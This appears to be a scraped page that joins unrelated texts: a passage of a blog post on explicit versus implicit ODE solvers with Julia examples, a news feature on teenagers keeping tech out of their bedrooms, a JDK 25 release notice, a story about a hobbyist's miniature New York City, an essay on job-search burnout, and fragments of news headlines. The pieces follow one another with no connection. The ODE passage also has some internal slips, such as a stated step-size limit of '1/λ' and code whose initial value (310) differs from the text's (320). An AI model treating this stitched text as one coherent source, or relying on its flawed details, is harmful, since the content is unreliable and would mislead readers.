$$w_i’ = \lambda_i w_i$$
where $w_i$ is the vector in the direction of the $i$th eigenvector of $A$, and $\lambda_i$ is the $i$th eigenvalue of $A$. Thus our simple linear ODE $u’ = \lambda u$ tells us about general linear systems along the eigenvectors. Importantly, since even for real $A$ we can have $\lambda$ be a complex number, i.e. real-valued matrices can have complex eigenvalues, it’s important to allow for $\lambda$ to be complex to understand all possible systems.
But why is this important for any other ODE? Well by the Hartman-Grobman theorem, for any sufficiently nice ODE:
$$u’ = f(u)$$
We can locally approximate the ODE by:
$$u’ = Au$$
where $A = f'(u)$, i.e. $A$ is the linear system defined by the Jacobian local to the point. This is effectively saying any “sufficiently nice” system (i.e. if $f$ isn’t some crazy absurd function and has properties like being differentiable), you can understand how things locally move by looking at the system approximated by a linear system, where the right linear approximation is given by the Jacobian. And we know that linear systems then boil down generally to just the scalar linear system, and so understanding the behavior of a solver on the scalar linear system tells us a lot about how it will do “for small enough h”.
Okay, there are lots of unanswered questions, such as what if $A$ is not diagonalizable? What if $f$ is not differentiable? What if the system is very nonlinear so the Jacobian changes very rapidly? But under assumptions that things are nice enough, we can say that if a solver does well on $u’ = \lambda u$ then it is probably some idea of good.
So now we have a metric by which we can analyze ODEs: if they have good behavior on $u’ = \lambda u$, then they are likely to be good in general. So what does it mean to have good behavior on $u’ = \lambda u$? One nice property would be to at least be asymptotically correct for the most basic statement, i.e. does it go to zero when it should? If you have $u’ = \lambda u$ and $\lambda$ is negative, then the analytical solution $u(t) = \exp(\lambda t)u(0)$ goes to zero as $t$ goes to infinity. So a good question to ask is, for a given numerical method, for what values of $h$ (the time step size) does the numerical method give a solution that goes to zero, and for which $h$ does it get an infinitely incorrect answer?
To understand this, we just take a numerical method and plug in the test equation. So the first thing to look at is Euler’s method. For Euler’s method, we step forward by $h$ by assuming the derivative is constant along the interval, or:
$$u_{n+1} = u_n + hf(u_n)$$
When does this method give a solution that is asymptotically consistent? With a little bit of algebra:
$$u_{n+1} = u_n + h\lambda u_n$$
$$u_{n+1} = (1 + h\lambda) u_n$$
Let $z = h\lambda$, which means
$$u_{n+1} = (1 + z) u_n$$
This is a discrete dynamical system which has the analytical solution:
$$u_n = u_0 (1+z)^{n}$$
Note that if $1 + z > 1$, then $(1+z)^n$ keeps growing as $n$ increases, so this goes to infinity, while if $1 + z < 1$ it goes to zero. But since $\lambda$ can actually be a complex number, the analysis is a little bit more complex (pun intended), but it effectively means that if $z$ is in the unit circle shifted to the left in the complex plane by 1, then $u_n \rightarrow 0$. This gives us the definition of the stability region, $G(z)$ is the region for which $u_n \rightarrow 0$, and this is the shifted unit circle in the complex plane for explicit Euler.
This shows a pretty bad property for this method. For any given $\lambda$ with negative real part, there is a maximum $h$, actually $h = 1/\lambda$, such that for any larger step size we don’t just get a bad answer, we can get an infinitely bad answer, i.e. the analytical solution goes to zero but the numerical solution goes to infinity!
So, is there a method that doesn’t have this bad property? In comes the implicit methods. If you run the same analysis with implicit Euler,
$$u_{n+1} = u_n + hf(u_{n+1})$$
$$u_{n+1} = u_n + h\lambda u_{n+1}$$
$$(1-z) u_{n+1} = u_n$$
$$u_{n+1} = \frac{1}{1-z} u_n$$
Then we have almost an “inverse” answer, i.e. $G(z)$ is everything except the unit circle in the complex plane shifted to the right. This means that for any $\lambda$ with negative real part, for any $h$ the implicit Euler method has $u_n \rightarrow 0$, therefore it’s never infinitely wrong.
Therefore it’s just better, QED.
This then generalizes to more advanced methods. For example, the stability region of RK4
an explicit method has a maximum $h$, while the stability region of BDF2
an implicit method does not. You can even prove it’s impossible for any explicit method to have this “good” property, so “implicit methods are better”. QED times 2, done deal.
Wait a second, what about that other “wrongness”?
Any attentive student should immediately throw their hand up. “Teacher, given the $G(z)$ you said, you also have that for any $\lambda$ where $\text{Re}(\lambda)>1$, you also have that $u_n \rightarrow 0$, but in reality the analytical solution has $u(t) \rightarrow \infty$, so implicit Euler is infinitely wrong! And explicit Euler has the correct asymptotic behavior since it goes to infinity!”
That is completely correct! But it can be easy to brush this off with “practical concerns”. If you have a real model which has positive real eigenvalues like that, then it’s just going to explode to infinity. Those kinds of models aren’t really realistic? Energy goes to infinity, angular momentum goes to infinity, the chemical concentration goes to infinity: whatever you’re modeling just goes crazy! If you’re in this scenario, then your model is probably wrong. Or if the model isn’t wrong, the numerical methods aren’t very good anyways. If you analyze the error propagation properties, you’ll see the error of the numerical method also increases exponentially! So this is a case you shouldn’t be modeling anyways.
Seeing this robustness in practice
Therefore if you need a more accurate result, use an implicit method. And you don’t need to go to very difficult models to see this manifest in practice. Take the linear ODE:
$$T’ = 5(300-T)$$
with $T(0) = 320$. This is a simple model of cooling an object with a constant temperature influx. It’s easy to analytically solve, you just have an exponential fall in the temperature towards $T = 300$ the steady state. But when we solve it with an explicit method at default tolerances, that’s not what we see:
using OrdinaryDiffEq
function cooling(du,u,p,t)
du[1] = 5.0*(300-u[1])end
u0 = [310.0]
tspan = (0.0,10.0)
prob = ODEProblem(cooling, u0, tspan)
sol = solve(prob, Tsit5())using Plots
plot(sol, title="RK Method, Cooling Problem")
savefig("rk_cooling.png")
We see that the explicit method gives oscillations in the solution! Meanwhile, if we take a “robust” implicit method like the BDF method from the classic C++ library SUNDIALS, we can solve this:
using Sundials
sol = solve(prob, CVODE_BDF())
plot(sol, title="BDF Method, Cooling Problem")
savefig("bdf_cooling.png")
Sure it’s not perfectly accurate, but at least it doesn’t give extremely wrong behavior. We can decrease tolerances to make this all go away,
But the main point is that the explicit method is just generally “less robust”, you have to be more careful, it can give things that are just qualitatively wrong.
This means that “good tools”, tools that have a reputation for robustness, they should default to just using implicit solvers because that’s going to be better. And you see that in tools like Modelica. For example, the
Modelica University’s playground
and other tools in the space like OpenModelica and Dymola, default to implicit solvers like DASSL. And you can see they do great on this problem by default!
So QED, that’s the “right thing to do”: if you want to be robust, stick to implicit methods.
But why oscillations?
Hold up a bit… why does the explicit method give oscillations? While we know that’s wrong, it would be good to understand why it gives the qualitatively wrong behavior that it does. It turns out that this falls right out of the definition of the method. If you go back to the definition of explicit Euler on the test problem, i.e.
$$u_{n+1} = u_n + hf(u_n)$$
then substitute in:
$$u_{n+1} = (1 + h\lambda) u_{n}$$
If we think about our stability criteria $G(z)$ another way, its boundaries are exactly the value by which the next $u_{n+1}$ would have a negative real part. So the analytical solution is supposed to go to zero, but the “bad” behavior is when we choose a step size $h$ such that if we extrapolate out with a straight line for $h$ long in time, then we will “jump” over this zero, something that doesn’t happen in the analytical solution. But now let’s think about what happens in that case. If you jump over zero, then $u_n < 0$ (think real right now), so therefore the derivative of the next update points in the other direction, i.e. we're still going towards zero, but now from the negative side we go up to zero. But since $\|1 + h\lambda\| > 1$, we have that $\|u_{n+1}\| > \|u_n\|$, i.e. the norm of the solution keeps growing. So you jump from positive to negative, then negative to positive, then positive to negative, where the jumps are growing each time. This is the phantom oscillations of the explicit ODE solver!
So what’s happening is the default tolerances of the explicit ODE solver were large enough that the chosen $h$s were in the range of the phantom oscillation behavior, and so you just need to cap $h$ below that value, which is dependent on the real part of the eigenvalue of $h$ (you can do the same analysis with complex numbers, but that just gives rotations in the complex plane along with the real part oscillation).
But if explicit methods give oscillations, what’s going on with implicit ODE solvers with large $h$? Let’s look at the update equation again:
$$u_{n+1} = \frac{1}{1-z} u_n$$
now instead of multiplying each time by $(1-z)$, we divide by it. This means that when $\lambda < 0$ (or $\text{Re}(\lambda) < 0$ to be more exact), then for any $h$ we have that $\|u_{n+1}\| < \|u_{n}\|$. Therefore, we might jump over the zero with a big enough $h$, but we are guaranteed that our "jump size" is always shrinking. Thus for any $h$, we will get to zero because we're always shrinking in absolute value.
This means that implicit methods are working because they have a natural dampening effect. So:
This explains in more detail why we saw what we saw: the explicit method when the error tolerance is sufficiently high will introduce oscillations that don’t exist, while the implicit method will not have this behavior. This is a more refined version of the “energy doesn’t go to infinity!”, now it’s “energy doesn’t come from nowhere in real systems”, and because of this implicit solvers give a better qualitative answer. This is why they are more robust, which is why robust software for real engineers just always default to them.
Wait a second… do we always want that?
You should now be the student in the front row raising your hand, “implicit methods are always dampening… is that actually a good idea? Are you sure that’s always correct?” And the answer is… well it’s not. And that then gives us exactly the failure case for which implicit methods are less robust. If you have a system that is supposed to actually oscillate, then this “hey let’s always dampen everything to make solving more robust” actually leads to very wrong answers!
To highlight this, let’s just take a simple oscillator. You can think of this as a harmonic oscillator, or you can think about it as a simple model of a planet going around a star. However you want to envision it, you can write it out as a system of ODEs:
$$u_1′ = 500u_2$$
$$u_2′ = -500u_1$$
This is the linear ODE $u’ = Au$ where $A = [0\ 500; -500\ 0]$, which has complex eigenvalues with zero real part. In other words, the analytical solution is $\sin(500t)$ and $\cos(500t)$, just a pure oscillation that just keeps going around and around in circles. If we solve this with an explicit ODE solver:
we can see that it generally gets the right answer. Over time you get some drift where the energy is slowly increasing due to numerical error in each step, but it’s going around in circles relatively well. However, our “robust implicit method”…
sol = solve(prob, CVODE_BDF())
plot(sol, title="BDF Method", idxs=(1,2))
savefig("bdf_oscillate.png")
It says the answer goes to zero! Even when the analytical solution is just a circle! But we can understand why this is the case: the software developers made the implicit assumption that “dampening oscillations is always good, because generally that’s what happens in models, so let’s always do this by default so people get better answers”, and the result of this choice is that if someone puts in a model of the Earth going around the sun, then oops the Earth hits the sun pretty quickly.
Conclusion: ODE solvers make trade-offs, you need to make the right ones for your domain
What about what was mentioned at the beginning of the article, “for hyperbolic PDEs you need to use explicit methods”? This isn’t a “special behavior” of PDEs, this is simply because for this domain, for example advective models of fluids, you want to conserve fluid as it moves. If you choose an implicit method, it “dampens” the solver, which means you get that as you integrate you get less and less fluid, breaking the conservation laws and giving qualitatively very incorrect solutions. If you use explicit methods, you don’t have this extraneous dampening, and this gives a better looking solution. But you can go even further and develop methods for which, if $h$ is sufficiently small, then you get little to no dampening. These are
SSP methods
, which we say are “for Hyperbolic PDEs (Conservation Laws)” but in reality what we mean is “when you don’t want things to dampen”.
But the point is, you can’t just say “if you want a better solution, use an implicit solver”. Maybe in some domains and for some problems that is true, but in other domains and problems that’s not true. And many numerical issues can stem from the implicit assumptions that follow from the choice being made for the integrator. Given all of this, it should be no surprise that much of the Modelica community has had many problems handling fluid models, the general flow of “everything is a DAE” → “always use an implicit solver” → “fluid models always dampen” → “we need to fix the dampening” could be fixed by making different assumptions at the solver level.
So, the next time someone tells you should just use ode15s or scipy.integrate.radau in order to make things robust without knowing anything about your problem, say “umm actually”.
Little Extra Details
The article is concluded. But here’s a few points I couldn’t fit into the narrative I want to mention:
Trapezoidal is cool
One piece I didn’t fit in here is that the Trapezoidal method is cool. The dampening property comes from L-stability, i.e. $G(z) \rightarrow 0$ as $\text{Re}(z) \rightarrow -\infty$. This is a stricter form of stability, since instead of just being stable for any finite $\lambda$, this also enforces that you are stable at the limit of bigger lambdas. “Most” implicit solvers that are used in practice, like Implicit Euler, have this property, and you can show the dampening is directly related to this property. But you can have an implicit method that isn’t L-stable. Some of these methods include Adams-Bashforth-Moulton methods, which are not even A-stable so they tend to have stability properties and act more like explicit methods. But the Trapezoidal method is A-stable without being L-stable, so it doesn’t tend to dampen while it tends to be also pretty stable. Though it’s not as stable, and the difference between “is stable for any linear ODE” versus “actually stable for nonlinear ODEs” (i.e. B-stability) is pronounced on real-world stiff problems. What this means in human terms is that the Trapezoidal method tends to not be stable enough for hard stiff problems, but it also doesn’t artificially dampen, so it can be a good default in cases where you know you have “some stiffness” but also want to keep some oscillations. One particular case of this is in some electrical circuit models with natural oscillators.
Lower order methods have purposes too
“All ODE solvers have a purpose”, I
give some talks that give the justification for many high order methods
, so in general “higher order is good if you solve with stricter tolerances and need more precision”. But lower order methods can be better because the higher order methods require that more derivatives of $f$ are defined, and if that’s not the case (like derivative discontinuities), then lower order methods will be more efficient. So even implicit Euler has cases where it’s better than higher order BDF methods, and it has to do with “how nice” $f$ is.
BDF methods like DASSL are actually α-stable
I said that generally implicit methods that you use are A-stable. That’s also a small lie to make the narrative simpler. The BDF methods which Sundials, DASSL, LSODE, FBDF, etc. use are actually α-stable, which means that they are actually missing some angle α of the complex plane for stability. The stability regions look like this:
So these BDF methods are actually pretty bad for other reasons on very oscillatory problems! Meanwhile, things like Rosenbrock methods can also solve DAEs while actually being L-stable, which can make them more stable in many situations where there’s oscillations towards a steady state. So there’s a trade-off there… again every method has a purpose. But this is another “ode15s is more stable than ode23s”… “well actually…”
Teens turned their rooms into tech-free zones. This was the result
These teens turned their rooms into tech-free zones. This was the result
Image caption,
Elizabeth can spend up to four hours a night in her room watching YouTube videos
A group of teenagers from Bradford, the 2025 UK City of Culture, agreed to take all technology out of their bedrooms for five days to see how they would cope.
We followed two of them, Elizabeth and Henry, to capture the highs and lows - and to see how long they lasted before giving in to temptation.
Thirteen-year-old Elizabeth says she rarely spends time with her parents after school.
The self-confessed Sabrina Carpenter fan normally heads straight to her bedroom for "three or four hours" to watch YouTube videos of her pop idol and chat to her friends.
"My bedroom is basically my peace place," she says.
But she is one of four teenagers at her secondary school to sign up to a tech-free bedroom challenge.
The annual event explores issues affecting teenagers, from smartphones to social media and knife crime to misinformation.
The teenagers will still be able to use their tech, including phones, tablets and laptops - but only in the communal areas of the house.
"It's going to be hard," says Elizabeth. "I'm someone who likes to be in my room."
Elizabeth's dad, Robin, thinks she will "crack before the end of the week" and take her phone into her bedroom.
"That's going to be a challenge for her," he says as Elizabeth starts to laugh.
He's so confident, in fact, that he's made a bet with his daughter.
"If she cracks, Dad gets a big bag of wine gums."
Image caption,
Elizabeth (centre) made a bet with her parents that she would be able to last five full days without any technology in her bedroom
Other students at Elizabeth's West Yorkshire school are also taking part in the project, including 15-year-old Eliza, who says the lack of private space to talk to friends is on her mind.
"I plan on making it as inconvenient as possible for [my family]," she says, describing her plan to spend time in shared family spaces, such as "on the stairs" and "on the sofa, but where they want to sit".
Michelle, 15, plans to "read a book to fall asleep", instead of staying up on her phone and laptop.
She says usually a normal night's sleep can be as little as "five hours, max".
Henry, 13, spends most of his time at home gaming with his friends online until nine or 10 at night.
However "the latest I've stayed up is probably about 2am," he says sheepishly.
"There's sometimes where I'll be gaming that I forget to even drink water."
Media caption,
Watch: 'I've signed up to give up all my tech in my bedroom'
In July, new rules come into force as part of the
Online Safety Act
to try and make the internet safer for young people.
Children's commissioner Dame Rachel de Souza says while these changes are "welcome and long overdue", parents should set boundaries for their children by "introducing phone-free time or unplugging before bed to promote better rest and wellbeing".
One in 10 boys spends more than 20 hours a week in their room away from their family.
Henry stored his PlayStation in a cupboard at the start of the week to try and avoid temptation, but it only stayed there for "about two hours" before being put into the living room.
It's a space where his mum, Alyson, often spends her evenings too, with Henry having to remind his friends to not swear when they're speaking on their headsets.
Although he says it means he can't "speak as freely" with his friends, Alyson says it has helped to "open up the conversation" between the pair.
It has also made her realise how much of Henry's friendships are built around online gaming.
"That's the biggest part. It's not really about playing the games, it's the social aspect."
He says another bonus of leaving his tech outside his bedroom at night has meant he hasn't got caught up watching "billions of videos" on TikTok just before he goes to sleep.
Henry says he is already sleeping much better, which in turn has "helped in school… in all subjects and all aspects".
'Teens still need lots of sleep'
Image caption,
Henry usually spends several hours a day in his bedroom gaming with his friends online
Improved sleep quality is something Dr Kaitlyn Regehr, associate prof in digital humanities at University College London, says she would expect the teens to experience after removing digital devices from their rooms.
"There are increasing reports of teens feeling tired during the school day because of their smartphone usage," she says.
She adds that teens "still need lots of sleep", which can be disrupted by overnight notifications or late-night exposure to blue light through smartphone screens.
Reflecting on Henry and Elizabeth's gaming, Dr Regehr says basic safety checks parents can do include checking if a teen knows exactly who it is they are gaming with, not having geo-locators turned on, and making sure the themes within the game are age-appropriate.
Image caption,
The teenagers were given analogue alarm clocks throughout the week-long experiment
By Wednesday, Elizabeth says she has found other unexpected benefits and has spent her evenings researching ballet lessons and baking chocolate chip bread "out of boredom".
"If I still had my tech, I would have procrastinated baking [until] next week," she says.
Her parents, Robin and Grace, say they've also noticed a change, with Elizabeth choosing to watch documentaries on the family TV rather than online videos in her room.
"[The project has] given her an idea that there's other things to do besides going on your mobile phone and your computer," says Robin.
'A lot better than sitting at home'
As the project comes to an end, the four teenagers swap stories of their tech-free week.
Michelle says she almost gave up on the challenge multiple times as she would like "some peace and quiet", while Eliza says being in a "really bad mood" with her family meant she went to the cinema with her friends.
"It was really fun actually… a lot better than sitting at home," she says.
"I wouldn't normally do that stuff, mainly opting to stay on my phone after school."
But what about the book Michelle planned to read through the week?
"I think I read one chapter, that's it," she says, adding "the reality is it's not going to happen".
Screen time isn't monitored by a quarter of parents
In a survey of 2,224 13 to 18-year-olds, conducted for BBC Radio 5 Live and BBC Bitesize, young people were asked about various aspects of life - including their smartphone habits, gaming and screen time.
More than a third (38%) of teenagers said they spent five or more hours on their phones on an average day.
39% would consider taking tech and screens out of their bedrooms to reduce time spent on their devices
Other ways to minimise time on their devices include using in-built settings such as screen time caps (59%) or scheduling regular screen time breaks (66%)
25% say their parents set clear limits on how much time they spend on tech, gaming or social media, while 47% say their parents sometimes set limits
However, more than a quarter (27%) say their parents don't set any limits
Back at home, Henry gleefully rips the 'tech free zone' sign off his bedroom door and instantly moves his PlayStation back onto his desk, but he says he will continue with some new habits he has picked up throughout the week.
"I'll keep my phone outside my bedroom at night because that has helped so much with my sleep."
Elizabeth's dad Robin is similarly impressed with his daughter's resilience - but it does mean he lost his bet.
"A deal's a deal," he says as he hands over two packets of sweets. "Well done."
The BBC asked social media and technology companies for the measures they put in place to help young users limit their screen time.
TikTok says that parents can set screen time limits and block their children using the app at certain times using their 'Family Pairing tool'. Also if a user aged under 16 is using TikTok after 10pm it prompts a 'wind down' feature with a full-screen reminder.
Snapchat pointed us to their UK parent guide in which it suggests that parents set screen time guidelines with their children.
Instagram parent company Meta says that they have introduced 'Instagram Teen Accounts' which switch to sleep mode after 10pm and remind users to leave the app after 60 minutes. There are also parental supervision tools on Instagram, Facebook and Messenger.
YouTube says it has "robust" parental controls and has recently made its Take a Break and Bedtime reminders more prominent.
Get in touch
Is your child's bedroom a tech-free zone? Get in touch with your experiences or tips.
JDK 25, the reference implementation of Java 25, is now Generally
Available. We shipped build 36 as the second Release Candidate of
JDK 25 on 15 August, and no P1 bugs have been reported since then.
Build 36 is therefore now the GA build, ready for production use.
GPL-licensed OpenJDK builds from Oracle are available here:
https://jdk.java.net/25
Builds from other vendors will no doubt be available soon.
This release includes eighteen JEPs [1]:
470: PEM Encodings of Cryptographic Objects (Preview)
502: Stable Values (Preview)
503: Remove the 32-bit x86 Port
505: Structured Concurrency (Fifth Preview)
506: Scoped Values
507: Primitive Types in Patterns, instanceof, and switch (Third Preview)
508: Vector API (Tenth Incubator)
509: JFR CPU-Time Profiling (Experimental)
510: Key Derivation Function API
511: Module Import Declarations
512: Compact Source Files and Instance Main Methods
513: Flexible Constructor Bodies
514: Ahead-of-Time Command-Line Ergonomics
515: Ahead-of-Time Method Profiling
518: JFR Cooperative Sampling
519: Compact Object Headers
520: JFR Method Timing & Tracing
521: Generational Shenandoah
This release also includes, as usual, hundreds of smaller enhancements
and thousands of bug fixes.
Thanks to everyone who contributed this release, whether by designing
and implementing features or enhancements, by fixing bugs, or by testing
the early-access builds!
- Mark
[1] https://openjdk.org/projects/jdk/25/
Reno may be “the biggest little city in the world,” but it's got some serious competition from the miniature New York City that hobbyist Joseph Macken built in his upstate New York basement over two decades.
“I sat down in my basement, turned the camera on on my phone and just started talking about my first section, which was Downtown Manhattan,” the Clifton Park resident said on a recent Thursday about
his viral TikToks
on his roughly 50-by-30-foot scale model of the city. “It just took off.”
The intricate model features what Macken says are hundreds of thousands buildings, landmarks and geographic elements across the five boroughs and their surroundings, including bridges, airports, the Hudson and East rivers, New York Harbor, Central Park, One World Trade Center and the
original World Trade Center
, the Statue of Liberty and Empire State Building. The work consists of 350 handmade sections that are pieced together and can be taken apart and moved.
Macken’s videos, which he began posting on TikTok this spring at his children’s urging, have garnered well over 20 million views and myriad praise in recent months. In them, he discusses his creative process and takes viewers on helicopter-like tours of his hometown.
A close up of Macken's model Manhattan
Joseph Macken
“We’re about maybe 2,000 feet off the ground, looking down on all the houses and all the neighborhoods,” he says in a
video posted earlier this week
.
“This is genuinely unreal,” one commenter responded.
“Don't sell it for under $10 million,” another noted.
“A museum needs to display this ASAP,” YouTube’s official account
commented
on one of Macken’s clips in July.
Macken, a 63-year-old truck driver who grew up in Middle Village and has no formal carpentry or engineering training, said he dreamed of replicating the
Queens Museum’s famous “Panorama”
after an elementary school trip when he was a kid. He embarked on the endeavor in 2004, armed with little more than balsa wood, Elmer’s glue and Styrofoam. His first building was “the RCA building at Rockefeller Center,” he said, referring to 30 Rock, which was formerly named for its longtime tenant, the Radio Corporation of America.
Macken said it took him about
10 years to build Manhattan
alone and 11 years for the
rest
of the
boroughs
. He completed his opus in April, and said he’s confident every building in the city is represented. (Gothamist could not independently verify this claim; the city has more than 1 million buildings, according to the Department of Buildings.)
A residential complex and surrounding buildings in Macken's mini NYC
Joseph Macken
“ I jumped outta my chair and I cheered,” Macken said of the moment he finished the last building, a house on Staten Island.
The project had outgrown Macken’s basement, but he’d built it so it could be
broken down into panels
and taken to a storage unit. He said it would have stayed there and collected dust if his kids had not encouraged him to get on TikTok and start sharing videos of the model.
Then, in early August, someone he delivered to on his truck route suggested he set up the model at a local event they were sponsoring. So Macken’s mini New York
went up at the Cobleskill Fairgrounds near Albany
, and can be seen there through Friday. It’s the first public display of the completed work.
Macken with his model Manhattan laid out
Joseph Macken
Macken is now working on a
mini Minneapolis
: “‘
Mary Tyler Moore
’ was one of my favorite shows growing up,” he said, adding that he plans to eventually do Los Angeles, Las Vegas and Chicago as well.
Some fans said they drove from as far as Baltimore to see the mini NYC in person.
“Pictures do not do justice. This was a masterpiece to witness in person today and well worth the three-and-a-half-hour drive,”
one TikTok user commented
.
Macken said he’s still figuring out what he’ll do next with the model, but he’s in talks with the Museum of the City of New York in Manhattan about an exhibit there. A museum spokesperson confirmed this, praising his “ingenuity, creativity and skill.”
“ I don't wanna put it back in storage,” Macken said. “That's for damn sure.”
MORE arts-entertainment
Sarah Boll fastened portholes and gold decals to her living room walls and outfitted her bedroom with gilded panels, among other decorations.
Enjoy outdoor performances, block parties, camping and more before the cold weather comes.
Enjoy outdoor performances, block parties, camping and more before the cold weather comes.
Catch up on the most important headlines with a roundup of essential NYC stories, delivered to your inbox daily.
I have the good fortune to have a job right now, but many of my friends are out of work. Most have been searching for a while. Some are encountering a problem that has my full sympathy, something I’ve experienced myself at various times. I’m not sure I can solve it, but maybe I can help put words to what some are going through.
The problem unfolds in three distinct phases as the job search drags on.
Phase I: The Obvious but Impossible Search
You’ve spent several months sending out scores of carefully tailored resumes and cover letters for jobs you know you are fully qualified for and would excel at. Usually you get no response. Occasionally you get a polite “position filled.” That’s it.
You’re knocking on all the obvious doors—all the jobs closest to what you’ve been doing—and nothing is opening up. It’s exhausting and frustrating. The very act of telling your friends you’re “discouraged” feels like swallowing a horse pill; “discouraged” does not reach the depths of your fear and despair.
The obvious path forward—finding a job in line with your resume—no longer looks like a path. It looks like The Cliffs of Insanity. What used to feel like the Obvious Way Forward now feels like the Impossible Way Forward. Somewhere in your brain there is a tank of gasoline that gets burned each time you force yourself to do something irksome. That tank has burned down to vapors.
You are burned out. You are burned out on search. You are burned out on an impossible search.
But you can’t stay still. So your mind looks for new paths.
Phase II: The Adjacent-to-Impossible Search
You consider job openings that aren’t quite aligned with what you were doing but might offer better chances. Maybe it’s in an adjacent industry, a slightly different role, or somewhere you never really wanted to live. Maybe you could take a small pay cut. Maybe an hour’s commute wouldn’t be so bad. You expand your search away from the impossible to a broader horizon, to things that are adjacent to impossible.
This often works! The compromises can turn out better than expected. A pay cut can lead to a quick raise that puts you ahead of your prior pay. Sometimes they turn out worse than expected, but the next job search goes better—new connections, new head space, more time for the market to improve.
Sometimes it doesn’t work. The employers don’t bite. The required compromises are just too dire. The adjacent-to-impossible jobs turn out to be impossible too.
You are burned out. You are very burned out. The creativity and spunk it took to expand your horizons has gone nowhere. That extra spark has died. The brain’s reserve gas tank is now showing “E.” You are suffering from a disease we call Adjacent-to-Impossible Search Burnout (AISB, for the medical professionals in the room).
But you can’t stay still. So your mind looks for new paths.
Phase III: Weird Search
Well, if none of the obvious or even next-to-obvious stuff is working, why hang around? Throw the gates wide open, go ronin, walk the whole horizon, drag the whole ocean. You could learn to make jewelry and open an Etsy shop. You could band together with friends and make that little app you’ve always talked about. You could open up that little coffee shop, that bakery, that catering business. You could go back to college and learn a new career.
It feels like giving up, though, doesn’t it? Wait, no! It feels like taking charge of your own destiny, plotting your own course, becoming
master of your fate,
all that sort of thing! Except, geez, at maybe one-half, one-fourth the pay, if you’re lucky? Maybe less, if you’re paying for college before you even start this new career.
And yet… what’s the alternative? Getting paid zero for the foreseeable future? Continuing to churn out groveling resumes and “I can’t wait to work at your wonderful company that doesn’t have the internal culture of decency or self-discipline to bother responding to this application that
you invited
, from someone
you know
really needs answers right now” cover letters?
So yes, you go weird, at least mentally, and you entertain ideas about what else in tarnation might possibly pay you a living wage while using your talents and filling up your joy-meter.
And sometimes this goes great. Almost every company or product we love started more or less like this. The next one might be yours. I like the weird path, and if you take it and it blossoms, I salute you and I bless you.
But we’re here for the ones that are still stuck in this place, this third phase.
You have been thwarted by the Cliffs of Insanity. You have become nauseated by the Wide World of Compromise. But nowhere else on your broad horizon has yet called you forward.
And here’s the deal: here’s how you know you are really at the end of the rope:
you are sick of freaking thinking about it.
You are sicking of trying to find jobs you
should
have. You are sick of trying to find jobs you
could
have. You are sick of trying to find jobs you
shouldn’t
have—jobs that could be fun but would make your grandmother shake her head a little. You are burned out on search. All possible gas tanks are empty. All the creative-hopeful-bright-idea-one-more-try sauce is gone, dried up, kaput.
You are Burned Out On Search (BOOS for the professionals). That’s the problem. That’s the disease. You’re welcome.
Solutions
I don’t know. I can’t solve your problem. If your problem wasn’t genuinely hard you would have solved it already. Some stranger who doesn’t know your situation ain’t gonna solve it. But here are some notes I’ve picked up along similar roads.
You’re not alone.
A lot, a
lot
of people are in this boat right now, and frankly, in any given year somebody, probably somebody you know, is in this boat. As I write, 40% of unemployed people have been out of work for at least 15 weeks. That’s almost four months. Fully a fourth have been unemployed at least 27 weeks: over six months. Unemployment is not strange or rare. Happens to everybody: good, capable people who did miracles at prior organizations and will do them again, they just can’t do them right now.
It sucks real bad.
Let’s not understate the horror of unemployment in a modern economy. Talk about a Cliff of Insanity: there is an unbelievable drop in wellbeing from the employed to unemployed. I don’t need to spell it all out—the money stuff, the healthcare stuff, the embarrassment, the boredom, the fear. It’s bad.
And yet somehow in the grand scheme of social sympathy and compassion, unemployment doesn’t get a lot of loving. Tell folks you’ve got knee problems, house foundation problems, college debt, divorce, death in the family, hair stylist went rogue this morning and messed up your cowlick, and here comes all kinds of sympathy. Tell them you’re unemployed, what do you get? “Oh yeah I was unemployed one month ten years ago boy that sucked.” Yes, friend, yes it does suck right now six months in, and unlike your little story there I don’t know when or if it will ever stop.
But I do feel you. High five. I feel you.
It won’t turn out as bad as you fear.
How often have you known somebody whose life was really, finally wrecked by unemployment? I mean, they truly never got back on their feet. Maybe previously they had a decent home, but then they became homeless, and now they’re still homeless? I’m not just talking about stories and imagination and movies right now, I’m talking about who do you personally know who’s had it go that badly?
And look, it does happen. I’m not saying that 100% of people spring back from unemployment. But in your experience what percentage of people get back to a decent place? 90%? It’s got to be more than that. 95%? 99%? Most of the time, your friends and family members go through a period of unemployment and then they find a new, good life on the other side. It might be in the obvious place, it might not be. It might be on one of those “weird paths” we talked about, but very often the new path, no matter how weird, becomes stable and sufficient and even joyful.
People—
you
—are more resilient and resourceful than you think. You are skillful at
imagining bad outcomes
. You are also skillful at
avoiding them.
Do yourself a favor, set aside the
imagining bad
outcomes
skill for a year or two and focus for now on the
avoiding
skill—and the
finding
skill that runs along with it.
It’s okay to rest.
This is the best lesson I’ve learned from these kinds of seasons. When you’ve searched and you’ve searched without success until you’re sick of searches, usually the lesson is: now it’s time to rest.
There is a time for hard work, very hard work. There’s a time to push yourself, even to push beyond the limits of what you think you can endure. But a time comes when you are at the limit, at least for now. In those times, the word is “rest.”
Rest is much more than mere idleness. When you rest you give your mind the space to explore possibilities it never had time to consider. Often this exploration happens without your knowing it. Suddenly you see a new way to tackle that challenge. Or you realize it was the wrong challenge to begin with, that what you needed was a different quest. Rest refuels the mind. It refills the gas tanks. It untwists wounded joints. It builds up sore muscles.
We’re not talking about watching eight hours of YouTube every day or playing video games till 4 AM. Rest is all about space. It engages purposefully with serious boredom. You’re going to need to get in there and stare at some ceilings—or better yet, from a hammock, at some skies. Give the mind space to think.
Rest should involve time with friends but also plenty of solitude. It ought to involve some deep reading—books, not just the short pieces—especially those that are full of new ideas, not on the usual menu, surprising perspectives that get your thoughts percolating.
Rest needs to be done well. Set your alarm. Make appointments and keep them. Get outside. Use your hands.
When you’re Burned Out On Search, what do you do next? When we ask it that way the answer becomes obvious. You rest. It’s the only antidote to burn out. Give your mind time to rebuild and it will find ways forward that you never expected. Sometimes the best way to search is… not to search.
Discover more from Holy Ghost Stories
Subscribe to get the latest posts sent to your email.
CIA Freedom of Information Act Electronic Reading Room
U.S. Acts as "Judge, Jury & Executioner" in Venezuelan Boat Strikes, Killing at Least 14
Democracy Now!
www.democracynow.org
2025-09-16 13:48:53
On Monday, President Trump announced the U.S. bombed a boat in international waters, killing three people. The attack was the second to target what the Trump administration claims are drug smugglers from Venezuela. A previous strike on another boat killed 11 people. In a third incident, the U.S. Nav...
